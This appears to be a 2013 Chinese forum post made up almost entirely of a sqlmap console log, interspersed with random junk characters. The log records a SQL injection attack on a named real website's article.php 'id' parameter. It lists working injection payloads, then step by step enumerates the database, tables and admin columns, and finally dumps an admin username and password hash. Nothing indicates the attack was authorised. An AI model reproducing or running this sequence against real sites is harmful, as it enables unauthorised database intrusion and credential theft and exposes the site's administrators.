D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. b7 G$ c5 h) Fms "Mysql" --current-user /* 注解:获取当前用户名称) J* d* j8 D: m& Q& O
sqlmap/0.9 - automatic SQL injection and database takeover tool
6 I" h. W: }- u) K l http://sqlmap.sourceforge.net starting at: 16:53:54
: V- N" L1 E0 c" G$ X1 @[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
) `( ~% d* b T6 |) u# Q5 }! _ session file
4 Q8 r4 }5 _' |, L. i[16:53:54] [INFO] resuming injection data from session file
- H; f6 H0 d# n4 e[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
0 R# L0 @- i! n- h[16:53:54] [INFO] testing connection to the target url
( l- e# R g a3 M8 P& Psqlmap identified the following injection points with a total of 0 HTTP(s) reque3 F. a i) d& C# A; S1 L
sts:
) R4 R2 j$ |. W0 r5 r7 _ [) A8 r---$ D: T) t# t1 p# Z T
Place: GET
- O3 X0 q8 |( xParameter: id
# R7 f) m+ Z% Y3 q$ f! ?, x Type: boolean-based blind1 \* L% o/ x0 o5 f% h
Title: AND boolean-based blind - WHERE or HAVING clause
5 s* D% {9 V/ x7 t7 `6 F+ E8 m Payload: id=276 AND 799=799& {' ]% M. t- g4 f$ |0 [7 G6 y
Type: error-based6 y \' M5 I/ [ |6 w6 L
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
4 U( k3 S2 U/ Y5 s0 c Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( j7 b! k0 k! S+ w2 s4 r2 E
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 E- C. k* D) Z3 o),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): J2 _6 q2 e3 q1 ^) k/ U0 e3 U
Type: UNION query7 n# ?" `; f( Q" t4 d
Title: MySQL UNION query (NULL) - 1 to 10 columns/ b) b# J6 J( b/ ]
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 {) y: Z+ u& M0 g(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 a0 g0 T8 S1 t! p- c9 A9 W9 C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 K& K( J- G" }
Type: AND/OR time-based blind
' `& M" M8 U% D Title: MySQL > 5.0.11 AND time-based blind
3 K( @/ b& `8 B5 Z+ h' Z Payload: id=276 AND SLEEP(5)
. g6 O/ a2 J( ]! C---
- A! r# P7 B: k* p' J/ w' d[16:53:55] [INFO] the back-end DBMS is MySQL
' b; y' S' i4 h& kweb server operating system: Windows( \# c8 \& P+ D
web application technology: Apache 2.2.11, PHP 5.3.0: p3 k( J& C+ Y# ~ i B
back-end DBMS: MySQL 5.04 D0 ?3 c, z$ h+ ~5 B6 j. Q. H
[16:53:55] [INFO] fetching current user
5 n# `! b, r' l$ s" l' jcurrent user: 'root@localhost'
3 ^- c2 W0 u0 n2 p9 r0 j( q[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou7 Y$ G7 o J5 r
tput\www.wepost.com.hk' shutting down at: 16:53:58
- }) t% @& h$ r3 @0 A
4 w3 @) e3 b& ZD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& T% ^( V* W% E) Q9 w S( P
ms "Mysql" --current-db /*当前数据库
8 H6 ?) K& F3 F2 e sqlmap/0.9 - automatic SQL injection and database takeover tool
# f- O. {0 ~ B- X http://sqlmap.sourceforge.net starting at: 16:54:16
) X2 S' Q0 H. m+ A" v1 L u[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as H, {* R0 P8 b
session file
8 T7 R% @; Y" u8 z% R[16:54:16] [INFO] resuming injection data from session file
m4 s( e% }/ V! e8 w3 |& O[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 m! `2 \" G% `- `; t9 w[16:54:16] [INFO] testing connection to the target url9 H. ?* n4 y$ w7 ?! V
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
1 [8 \$ h5 a8 l# U6 V* ~0 e/ bsts:
) X+ A, |3 i' V$ s% A---6 C* e9 q2 i5 z- |( s
Place: GET% z0 M5 K# W1 N0 {4 ?+ d, W
Parameter: id/ ?- A& Z% v7 {/ q( K7 F1 a
Type: boolean-based blind0 U7 Y+ T# Y! t' N% ?! l0 ]/ ~; x6 P
Title: AND boolean-based blind - WHERE or HAVING clause* X; e( {' O, o: D1 ?
Payload: id=276 AND 799=799. j Z: o+ {3 l: O# y
Type: error-based$ O4 Q7 `7 E# R2 S
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
; \; Y) Y/ }6 j+ p5 y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 K: R8 s( t- J3 _! y% @2 T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) a; }, N- t9 q3 @ W3 b* h
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
) u8 S+ u0 W! D0 \ e8 N) k Type: UNION query: U8 `7 I# s# N) X
Title: MySQL UNION query (NULL) - 1 to 10 columns$ ^% I" V8 D( Z O# T5 L: F
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# J+ c5 K/ V6 ?8 C' t# A! D3 \(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
6 ^' X9 f4 Y# c* g, D1 p2 ^CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
# g0 ^/ b# R8 c Type: AND/OR time-based blind
( y! G7 d7 G4 I Title: MySQL > 5.0.11 AND time-based blind
; d( t7 l% o: H' G9 N; ?% ~ Payload: id=276 AND SLEEP(5)2 x4 w' b. D& \& U6 R; i
---
5 h+ V2 G$ p' Y3 a- s, O[16:54:17] [INFO] the back-end DBMS is MySQL4 J' X# z/ q# N& y
web server operating system: Windows
; x) x$ _* w* s5 mweb application technology: Apache 2.2.11, PHP 5.3.0, D2 b0 p) @5 R% S [4 B& [ ^- z
back-end DBMS: MySQL 5.0
! v# m7 {( L# P1 T0 k[16:54:17] [INFO] fetching current database
. O% Q9 u/ F- E' z b! M1 Qcurrent database: 'wepost'
& ?/ d4 ]+ |) m x) k Q% [[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 s* e$ b$ \+ U, J0 F0 T
tput\www.wepost.com.hk' shutting down at: 16:54:18$ q' I/ S% I0 R ~ z
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) ]; u6 g! u" e/ {
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名9 a' ?8 F: t/ b, J) O: M! w, @
sqlmap/0.9 - automatic SQL injection and database takeover tool( K' U1 n4 Q& s* c l* B
http://sqlmap.sourceforge.net starting at: 16:55:25, b P. u. B, K. m: b
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
; K7 N4 w4 `1 j session file
% u0 _8 w0 \% J `0 @[16:55:25] [INFO] resuming injection data from session file
1 d! l8 q9 ~8 m# B( e9 o[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
" ~/ [" W( ?' F9 D[16:55:25] [INFO] testing connection to the target url5 _) `5 Y9 f0 P( J2 I4 D( Q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
! t5 L4 h+ b. i* g- xsts:1 v: F6 U1 D" X; K' d% M. A& l W
---
! c9 V J: h+ l* F. hPlace: GET' j4 L! |9 o( ?- i
Parameter: id
' c8 [7 L* t3 J, m0 P, u Type: boolean-based blind
$ `' U, ~# g" h4 A Title: AND boolean-based blind - WHERE or HAVING clause
6 s( V1 ]1 ?; O5 x) \ p# ` Payload: id=276 AND 799=799
0 ?& o- I( p2 e3 ^! G Type: error-based
$ M9 ?7 W9 @# e# U9 a- S Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
6 C6 u; N8 Z2 s# l" Q Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 z. a- L4 \4 l3 ~5 |! C' A120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 M( R& G" _6 b# r" g' r
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
& Z5 k0 ~, z/ K2 n E7 \' T Type: UNION query E' `4 C) y ]- v0 F
Title: MySQL UNION query (NULL) - 1 to 10 columns6 H e$ j0 h$ X( J8 e8 x( A
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR' J5 v L, z( c: F
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* B7 Z! O! \ c1 o3 P9 SCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) j+ T6 ~& T" t; y Type: AND/OR time-based blind
% B# j) e, I4 Y9 J X, G Title: MySQL > 5.0.11 AND time-based blind
9 x% I- y4 f+ y- R) M7 h* \ Payload: id=276 AND SLEEP(5)
+ k. ^) A4 w: j# G( K) n---6 P) ~0 h1 A! n2 j, t) Y1 O
[16:55:26] [INFO] the back-end DBMS is MySQL
! c9 \1 _0 `! D b, N; \web server operating system: Windows
+ l# |( _2 A: `- uweb application technology: Apache 2.2.11, PHP 5.3.0( c2 _: g+ k( E" E3 V5 [
back-end DBMS: MySQL 5.0
& ^ _7 C4 [: {' e+ I- P9 y) T[16:55:26] [INFO] fetching tables for database 'wepost'; L% W1 v: {) }+ I
[16:55:27] [INFO] the SQL query used returns 6 entries& r; n/ h. C3 B* X" M1 W
Database: wepost
7 S! h1 a* o+ ^3 \' T[6 tables]
5 L* Z3 j$ ^5 S3 O1 N( h- n6 ]+-------------+
; X3 C. o8 K B4 T7 \| admin |8 L+ x+ t) W" t
| article |
$ r* ^8 o: |( _6 \6 D) H2 k| contributor |( l; ]5 g5 z- u2 A+ n, _# T7 v
| idea |( ]4 ]3 m/ M" e. c6 n
| image |: {. w2 m5 r* R- c: C$ {! `
| issue |
# g6 B7 E- s8 ^# G9 ]8 Q- v% x+-------------+, H$ S# @- b C- Q' j
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. Y [5 }; m8 T- b) y* _9 O9 Etput\www.wepost.com.hk' shutting down at: 16:55:33
' D; P& j. s+ J* S: L& T6 @7 L$ ?. C
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 P j$ V. Z8 e- m/ [$ N
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名& H V) h4 n9 t8 l
sqlmap/0.9 - automatic SQL injection and database takeover tool
! Z6 X: U9 X1 I4 K http://sqlmap.sourceforge.net starting at: 16:56:06( {1 W( `& m" z7 |. B! ~8 i
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
# h3 O9 w- b/ h- P5 ~8 H& b4 o: Asts:
9 j$ u- h( m+ L2 y5 \6 y& p---) E- e% y1 c5 @
Place: GET! N; ^ s. F1 G) J! z/ Y/ y
Parameter: id6 p; X8 n$ W& E. F6 [& l
Type: boolean-based blind" j8 G% S. }8 m3 }- D5 `
Title: AND boolean-based blind - WHERE or HAVING clause% [5 P1 P+ B& ~3 ~5 z7 v9 K* L
Payload: id=276 AND 799=799
( y9 K: k; R& J/ z8 V Type: error-based: D5 P& y$ l9 @4 U5 T& r
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 J* } X$ Z- J( \- _ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
1 z% L' s1 S8 i& Z) V' A2 F7 I* c120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 p; w9 ?6 f) ~' a0 G. h' H4 ^" e A),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- |( z) A. L& p% a Type: UNION query
5 i% H) y2 ^" h Title: MySQL UNION query (NULL) - 1 to 10 columns
+ ?1 |3 x2 M& F9 K! y Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- K* o- v5 l r$ P3 i0 D
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),2 D# d6 @' I" Q: B0 R
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# G. g7 n% k% D5 Z |/ j8 W' l
Type: AND/OR time-based blind7 x; Y$ \( x3 ^" }1 [" w
Title: MySQL > 5.0.11 AND time-based blind4 v* L) B' R! |' E1 q3 ^4 K" x( c' S
Payload: id=276 AND SLEEP(5)
) G$ ]2 f z* }! e---5 R8 G3 A9 r6 C2 q4 F8 g2 h1 Q d3 r
web server operating system: Windows
! x2 Q2 D2 ~3 E1 V; N$ i. xweb application technology: Apache 2.2.11, PHP 5.3.0
: z+ v: v9 V2 d8 Z- P* x Nback-end DBMS: MySQL 5.0
2 Z/ A( k* u/ U[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
7 S8 f) A; a& Z5 v6 `: x: `5 O& z1 Dssion': wepost, wepost
7 }3 g5 K! @1 Y( X7 ]$ tDatabase: wepost
: Y B* _3 ~7 x0 u: c r( U7 {/ `3 VTable: admin2 r; I2 z7 B3 K/ f! |
[4 columns]
" d4 K- r U/ s6 I; }+----------+-------------+
4 e( A2 n7 N P| Column | Type |
2 l u) n2 \! @9 |* E" D+----------+-------------+1 H3 s" t9 }/ F. J+ Z/ P7 {4 t! u
| id | int(11) |
2 |' @7 h/ x7 ~% f) R% \| password | varchar(32) |8 p6 D% q9 T) G+ M1 {
| type | varchar(10) |
" v* Q7 _9 ]8 }: Q$ m1 T| userid | varchar(20) |
1 L; [4 J: D) A3 C8 X+----------+-------------+
. |8 J/ ~( T4 o; H shutting down at: 16:56:19
; `3 x$ } B8 Y, d9 X
; ]5 \, w: z/ J& z4 rD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. V' Y3 V$ r- ?( y; C6 C/ Rms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容0 z3 W G) ~2 C3 ~: j# Y
sqlmap/0.9 - automatic SQL injection and database takeover tool
" T* I6 h! L" ^8 r http://sqlmap.sourceforge.net starting at: 16:57:14
2 \3 r f/ V, |2 J7 asqlmap identified the following injection points with a total of 0 HTTP(s) reque
! R" o% q \& `" nsts:
& n( s* ?/ x6 Y- d- A8 s' w- W1 ?---
( E" N/ b' m9 u. B ePlace: GET
- H" o+ l8 X/ W) G" x [% KParameter: id5 y4 C4 i3 Y( d' |6 Q) g
Type: boolean-based blind
* Y! F' z& t+ h Title: AND boolean-based blind - WHERE or HAVING clause
, p" g+ j/ V) _2 m( ? Payload: id=276 AND 799=799
" I) z x7 O% [* V. t" j; r1 z Type: error-based+ J/ Y* J) R; L% ~6 e
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 o3 }( j l% q. n* l
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,, r* Z" e5 h# ~( k! M) j! A
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( k" q0 D) Q# m+ f& C
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
3 Y! K6 L8 r3 r/ k/ n Type: UNION query
; |/ X. p! o" o$ l' h( O7 W. `' W Title: MySQL UNION query (NULL) - 1 to 10 columns Q) K; ]6 \ t, m0 g
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# L# P/ a" U6 d5 s; h
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) |; M% f* p# ]4 { s* W3 g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 x2 z& ~& n+ X; h6 O9 j
Type: AND/OR time-based blind' S9 P; I1 [6 J* ~' X S
Title: MySQL > 5.0.11 AND time-based blind
) p: S0 r1 X, R! @' R+ _, W Payload: id=276 AND SLEEP(5)
# m$ t' {+ `" n. Y---
0 j9 M; k% T! M* v6 Y$ W8 U# \web server operating system: Windows
( f/ \4 Z( M4 E% f& hweb application technology: Apache 2.2.11, PHP 5.3.0
" g2 k7 m5 [; x0 \back-end DBMS: MySQL 5.0
+ S- e4 b. s, _$ U. H0 grecognized possible password hash values. do you want to use dictionary attack o- c1 P2 ^+ V0 a4 P* N7 G- s- ?
n retrieved table items? [Y/n/q] y
* }" a! Y7 j: Y! z) ^. vwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]' J7 {0 T% L2 [/ }/ }" O- }- k
do you want to use common password suffixes? (slow!) [y/N] y
# y9 U; C" r6 ~3 y! p8 ]& \' ]Database: wepost
5 R, l2 z/ X; g6 ^. D0 V* vTable: admin) Z# c5 a% m& r9 g
[1 entry]' ]/ b* O7 E9 {; I; s# x1 K
+----------------------------------+------------+
# r# X1 P6 U' u+ z v7 D/ H, a6 B| password | userid | H% j! W2 s# @9 g2 ` z$ `# v
+----------------------------------+------------+
/ @3 L3 ]' M6 ]% J| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
) A7 z! M/ {4 ~/ \! ^2 I$ L+----------------------------------+------------+
8 {3 Y+ n6 K* w4 B shutting down at: 16:58:14
6 C) M6 q7 v2 H: w5 G3 F) r
/ H y/ A1 E: z W: A# CD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对